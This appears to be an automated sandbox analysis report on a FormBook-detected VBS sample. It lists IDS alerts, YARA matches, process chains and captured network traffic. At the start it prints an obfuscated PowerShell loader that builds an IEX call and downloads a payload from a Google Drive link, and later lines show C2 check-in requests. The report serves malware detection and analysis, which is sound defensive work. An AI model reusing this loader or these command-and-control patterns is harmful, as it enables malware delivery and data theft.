              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Unutterability;function Bldagtigeres($Gravic){ .($Semidocumentary) ($Gravic)} function Sinterens($Efemerisk){$Jordspekulationens=4;do{$Velhavers+=$Efemerisk[$Jordspekulationens];$Jordspekulationens+=5;$Relatch=Format-List} until(!$Efemerisk[$Jordspekulationens])$Velhavers}$Feltundersgelses=Sinterens 'D fenTvise .hlT V r. Minw';$Feltundersgelses+=Sinterens 'Ca,sEUnpeBKontcIndeL,iquI ProEBibuNEnact';$forlngerledningen=Sinterens 'SproMabeloNicyz MotiVelol DaclClavaKbyt/';$Eelware=Sinterens 'EjedTStoplEtissMes,1a,di2';$Caplock='Unde[ achntilsESpalTTeak.BrinS PomeU skRManuV S miBo lCPr seEda P b iOSu eIPotaNUdsttclosm TabABe aNForfaRe dgXrayEfootRT.ss]Kata: Cac:Ac.psAan E FicCH lpuIngeRMichIPredTDetryGalaPAtler SproFindTLumbOBaancT.neOAfsplPelm= hel$MetaEHonoE O hlExubwSmaaAaffor,fveE';$forlngerledningen+=Sinterens ' ryo5Pyth. gri0 Ban ul(QuinWCosmiRig nR add.denoDaysw .ocsRead PeroNBroaTAm.n Sem1Ande0Stee.Parm0 Ont; orm KrusWF ntib evn ont6Nupp4Harv;Over HealxDumb6Fed 4outs;rein S,perIniqvBeca:Port1Solo3arri4Brak.Unpe0 F r)Unsm SvanG.llieZooicRep ke plo Pl./Secu2Kata0Audi1Bedd0Dend0 aab1Unus0Min.1Over GrilFhu tiUnderUsureoutefViceostadx.etr/Preo1 Bde3Estl4regn.In d0';$Paabegyndelsers=Sinterens 'Ce tUFabuSTeolE ameRSmaa-RetoAcompg DyseGylln ArkT';$Fibromyxosarcoma=Sinterens 'Tuneh Bl,t P ctCincpChansk nt: Bek/Unco/ UnidEmu.r MatiberavDisue ,fk. SucgDislo TogoPalig MaalBr.wejo,d.WroucFrivoUnjemVedt/Bogsu MelcUdmu?UforeSpejx rsep e,eoluger.strt ivs=BenedPar,oChe w NonnGladlM,sioSp oaUniddBorr&H xai ntedUnmi=Tsum1 ps GIr d7 SweZSa.lLNonqO RanAH bk9 UdbQA coZ NeuG F r5F,si-SandnAcrav Gr AAmebw Haltblaa0 dsabS alW eprXFerl8 B,fi IcoeMaalrGipsl,sop9,linM TimRvan,hTamigTantq';$Stenografere=Sinterens 'Gyn >';$Semidocumentary=Sinterens 'SmreI ConEElskX';$Hypermetamorphotic='Drklokke';$dirigentklokkernes='\Beflingens.Com';Bldagtigeres (Sinterens 'Drif$St mGModpLUntho.ismB StoAPjasLSub :Be eASuprf UndKCru rSla f,rmltUnareRockREmne= gte$Te,eeEmptnjuleV Co :Cat a .plp D,rPSa nD IntA rteTRuffAF nn+Hj d$I dfDFreiIT,otRUnsuI MongArvee mpln AretVe sk onLPugiObipekCarbkha,ve redRCalons ntEUdarS');Bldagtigeres (Sinterens ' Ist$r,paGExchlveneOButcbHe tA HysLHamm:VeteuJordDD safInaulsynge ndutKo tnerg.IBlovnEle.GPublEB.kkrStvlNT,ktESto =Big.$BookfRetsiFluoB InsR PleOFeltMforsY N,nx FacO VmsS Erha.ecirCompCFleto RanmMan a fo .Bit,sOverPMicrLCam.IUngdTDat (Non.$Gld SAlabT CumeInteN AftOEmfagDrejrh.emaChirF Gr Et.ttRT.acESy,u)');Bldagtigeres (Sinterens $Caplock);$Fibromyxosarcoma=$Udfletningerne[0];$Kumiss=(Sinterens ' ice$MbleGUdspLO enONon,B BriASerpLp ym: rbeK VagNCol,UB.ceS YelE sidL S rsHabikUnf eAnisn EmidGasdESvrvsBygn= Ba nbdleE S nWChei- B oO MolbN.alJLumbEUnr.CPapdtUmed F stsSpicyE ots,rget Tr EPalem Spl.Bic.$Cen fEnvieGrosl HaltSkudUTracnStegDUtt,eUnalRPseusSubrg TyneNe rl MaaSHalvEGanos');Bldagtigeres ($Kumiss);Bldagtigeres (Sinterens 'Togg$stemKLangn R nuSll.sparae,artlPocksUr.kkI
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7548, ProcessName: svchost.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-10T21:11:35.775533+010028033053Unknown Traffic192.168.2.449726142.250.184.206443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-10T21:12:37.395575+010028032702Potentially Bad Traffic192.168.2.449732172.217.23.110443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-10T21:13:12.892291+010028554651A Network Trojan was detected192.168.2.44973413.248.169.4880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-10T21:13:28.461922+010028554641A Network Trojan was detected192.168.2.44973584.32.84.3280TCP
              2025-03-10T21:13:31.717075+010028554641A Network Trojan was detected192.168.2.44973684.32.84.3280TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: U00b7pdf.vbsReversingLabs: Detection: 13%
              Yara detected FormBook
              Source: Yara matchFile source: 0000001E.00000002.2467721124.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.2463661384.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.2467865080.0000000000D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.2467491077.00000000051E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.2469446564.00000000055D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.2181502037.0000000023810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.2182064496.00000000265D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 216.58.206.33:443 -> 192.168.2.4:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 216.58.206.33:443 -> 192.168.2.4:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.23.110:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 216.58.206.33:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: Binary string: indows\System.Core.pdb source: powershell.exe, 0000000C.00000002.1838576608.00000000079DF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: dxdiag.exe, 00000019.00000002.2181549096.0000000023C1E000.00000040.00001000.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000002.2181549096.0000000023A80000.00000040.00001000.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.2058701032.0000000023712000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.2061182141.00000000238CC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: dxdiag.exe, dxdiag.exe, 00000019.00000002.2181549096.0000000023C1E000.00000040.00001000.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000002.2181549096.0000000023A80000.00000040.00001000.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.2058701032.0000000023712000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.2061182141.00000000238CC000.00000004.00000020.00020000.00000000.sdmp, findstr.exe
              Source: Binary string: stem.Core.pdb source: powershell.exe, 0000000C.00000002.1838576608.00000000079DF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdb source: powershell.exe, 00000003.00000002.1461444403.00000223A7E9B000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0086C830 FindFirstFileW,FindNextFileW,FindClose,30_2_0086C830

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 4x nop then xor eax, eax30_2_0085A100
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 4x nop then pop edi30_2_0085E473
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 4x nop then mov ebx, 00000004h30_2_00E704E8

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49735 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49736 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49734 -> 13.248.169.48:80
              Uses ping.exe to check the status of other devices and networks
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1G7ZLOA9QZG5-nvAwt0bWX8ierl9MRhgq HTTP/1.1Host: drive.google.com
              Source: global trafficHTTP traffic detected: GET /download?id=1G7ZLOA9QZG5-nvAwt0bWX8ierl9MRhgq&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
              Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
              Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
              Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49726 -> 142.250.184.206:443
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49732 -> 172.217.23.110:443
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1G7ZLOA9QZG5-nvAwt0bWX8ierl9MRhgq HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1G7ZLOA9QZG5-nvAwt0bWX8ierl9MRhgq HTTP/1.1Host: drive.google.com
              Source: global trafficHTTP traffic detected: GET /download?id=1G7ZLOA9QZG5-nvAwt0bWX8ierl9MRhgq&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OVlUq0BDU-cYs5xvYogyJd5qIDQB1pER HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1OVlUq0BDU-cYs5xvYogyJd5qIDQB1pER&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /mkxv/?_DxX9=GvGhRTQ8xnaToFmp&Sd=MK0ShD/VOT+mjwSTsaVeU6cpgDJma41hUarXaHeYlCN0x3qiLyvXgNTQnyE27cakbqtkm7ZzmuQjHRMwfybJg8/uVAzxxb2bWCipVm1F5XK7hvnY5T76PUQ= HTTP/1.1Host: www.matrixfitness.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G920A Build/LRX22G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36 [Pinterest/Android]
              Source: global trafficDNS traffic detected: DNS query: Host_6637.6637.6637.657e
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: global trafficDNS traffic detected: DNS query: www.matrixfitness.org
              Source: global trafficDNS traffic detected: DNS query: www.natividade.tech
              Source: unknownHTTP traffic detected: POST /3szq/ HTTP/1.1Host: www.natividade.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.natividade.techConnection: closeContent-Length: 199Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedReferer: http://www.natividade.tech/3szq/User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G920A Build/LRX22G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36 [Pinterest/Android]Data Raw: 53 64 3d 69 58 74 77 61 41 58 46 43 73 68 62 59 7a 62 34 58 4d 35 4e 31 43 4c 63 54 76 61 66 52 57 56 4f 64 59 48 6f 32 65 63 49 4c 35 34 6a 55 50 57 30 4f 56 5a 46 53 31 6c 74 2b 5a 32 79 63 37 4c 7a 66 41 69 39 2f 43 4f 4e 69 70 66 51 6f 30 44 67 52 67 68 67 65 2b 37 4a 51 39 32 4f 77 71 51 50 32 71 37 79 66 2f 71 76 67 64 38 53 37 2f 41 45 34 6c 72 74 6f 43 6a 5a 45 68 33 75 4c 35 73 6a 79 74 59 6c 78 6d 74 32 6e 76 65 59 68 61 4e 61 72 2b 66 4e 70 56 4a 2b 52 41 50 38 4d 31 62 45 6b 36 30 39 6d 46 70 38 50 52 6f 4a 4f 45 71 34 35 35 69 35 74 6f 2b 67 75 31 34 31 71 39 47 35 52 67 3d 3d Data Ascii: Sd=iXtwaAXFCshbYzb4XM5N1CLcTvafRWVOdYHo2ecIL54jUPW0OVZFS1lt+Z2yc7LzfAi9/CONipfQo0DgRghge+7JQ92OwqQP2q7yf/qvgd8S7/AE4lrtoCjZEh3uL5sjytYlxmt2nveYhaNar+fNpVJ+RAP8M1bEk609mFp8PRoJOEq455i5to+gu141q9G5Rg==
              Source: powershell.exe, 0000000C.00000002.1813807750.00000000031A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microzx
              Source: svchost.exe, 00000005.00000002.2470781353.000001FDE9C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: wscript.exe, 00000000.00000003.1184335860.0000020C5599F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1185125416.0000020C559A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
              Source: wscript.exe, 00000000.00000002.1200797342.0000020C53B9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1200183305.0000020C53B9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1199200820.0000020C53B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: wscript.exe, 00000000.00000002.1200797342.0000020C53B9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1200183305.0000020C53B9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1199200820.0000020C53B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: wscript.exe, 00000000.00000003.1185186416.0000020C53C0E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1185071348.0000020C53BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?641b210563e37
              Source: wscript.exe, 00000000.00000003.1185186416.0000020C53C0E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1185071348.0000020C53BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?641b210563
              Source: svchost.exe, 00000005.00000003.1205804911.000001FDE99B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: svchost.exe, 00000005.00000003.1205804911.000001FDE99B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
              Source: svchost.exe, 00000005.00000003.1205804911.000001FDE99B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: svchost.exe, 00000005.00000003.1205804911.000001FDE99B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: svchost.exe, 00000005.00000003.1205804911.000001FDE99B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: svchost.exe, 00000005.00000003.1205804911.000001FDE99B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: svchost.exe, 00000005.00000003.1205804911.000001FDE99ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: svchost.exe, 00000005.00000003.1205804911.000001FDE9AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: powershell.exe, 00000003.00000002.1451665041.000002239FB60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000003.00000002.1417163022.000002238FD17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000003.00000002.1417163022.000002238FAF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1816297065.0000000004CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000003.00000002.1417163022.000002238FD17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000003.00000002.1461444403.00000223A7EF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: powershell.exe, 00000003.00000002.1417163022.000002238FAF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000C.00000002.1816297065.0000000004CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000003.00000002.1417163022.000002238FF8A000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.1934699679.0000000007F33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000003.00000002.1451665041.000002239FB60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000003.00000002.1451665041.000002239FB60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000003.00000002.1451665041.000002239FB60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.g
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.go
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goo
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goog
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googl
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.c
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.co
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1417163022.000002238FD17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000002.2166177608.0000000007EC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/u
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?e
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?ex
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?exp
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expo
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expor
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=d
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=do
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=dow
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=down
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downl
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downlo
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downloa
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&i
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7Z
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZL
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLO
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9Q
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZ
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5-
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5-n
              Source: powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G7ZLOA9QZG5-nv
